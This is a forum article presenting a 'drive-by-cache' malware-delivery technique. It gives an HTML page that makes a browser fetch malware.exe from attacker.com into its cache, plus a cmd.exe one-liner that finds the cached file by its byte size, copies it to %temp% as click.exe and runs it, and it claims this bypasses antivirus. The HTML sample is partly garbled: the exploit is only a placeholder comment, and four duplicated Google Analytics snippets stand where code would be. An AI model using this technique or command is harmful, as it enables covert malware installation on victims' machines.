• Drive by Cache Exploits Example & Stearing remote Exploitation locally

    Author : "vinnu"
    Team : Legion Of Xtremers
    Special Thanx : Secfence Team
    Greets : Lord DeathStorm, Prashant Uniyal, b0nd, Fb1h2s, G4H, all my well/bad wishers.


    Drive-by-Cache
    This technique is an alternative to the heavily deployed drive-by-download. In this technique
    the shellcode doesnt download anything from remote location unlike to the drive-by-download
    shellcode.

    In drive-by-cache technique, the malware is instead downloaded by the browser or application itself.
    The URL of malware file can be specified into src of img, script,..., etc tags and the browser/application
    downloads and saves it into its own cache folder.

    Suppose, a malicious executable malware.exe resides on attacker.com, then following skelton is enough to force
    the browser to download it:

    <----dbc.htm---->
    <html>
    <body>

    <script src="http://www.attacker.com/malware.exe"></script>

    <!---
    exploit code and shellcode
    --->
    <script type="text/javascript">
    var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
    document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
    </script>
    <script type="text/javascript">
    try{
    var pageTracker = _gat._getTracker('UA-17311051-3');
    pageTracker._trackPageview();
    } catch(err) {}</script>
    <script type="text/javascript">
    var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
    document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
    </script>
    <script type="text/javascript">
    try{
    var pageTracker = _gat._getTracker('UA-17311051-3');
    pageTracker._trackPageview();
    } catch(err) {}</script>
    <script type="text/javascript">
    var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
    document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
    </script>
    <script type="text/javascript">
    try{
    var pageTracker = _gat._getTracker('UA-17311051-3');
    pageTracker._trackPageview();
    } catch(err) {}</script>
    <script type="text/javascript">
    var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
    document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
    </script>
    <script type="text/javascript">
    try{
    var pageTracker = _gat._getTracker('UA-17311051-3');
    pageTracker._trackPageview();
    } catch(err) {}</script>
    </body>
    </html>
    <!-------------->


    The Locations of cache folders for different browsers differ, but all resides under the hood of %USERPROFILE%
    folder deep inside.

    The malware get downloaded prior to the exploitation and gets saved into the cache and then the exploit fires up
    and if successfull, the shellcode will hunt for the file of same number of bytes as of malware.exe on attacker.com
    server.

    And the shellcode in this case is command execution. The hard part in this technique is to
    search the file in browser's/application's cache, but the file is saved as a temp file in most cases.
    So we need to copy the file with ".exe" extension and then execute it.

    Suppose we have placed a (windows XP's) calc.exe on the server as malware.exe, then its size in bytes is
    114688 bytes and following command will hunt it in %USERPROFILE% subfolders:


    cmd.exe /c for /R "%USERPROFILE%\" %i IN (*) DO if %~zi equ 114688 cmd.exe /c copy "%i" "%temp%\click.exe" /y & "%temp%\click.exe"


    Above command will copy the found file as click.exe in %temp% folder and execute it.

    The main advantage of this technique is that most of antivirus gets bypassed safely as, browser/application
    itself downloads the malicious file as general way.

    ..."vinnu"
    This article was originally published in forum thread: Drive-by-Cache & Stearing remote Exploitation locally started by &quot;vinnu&quot; View original post
  • G4H Facebook

  • G4H Twitter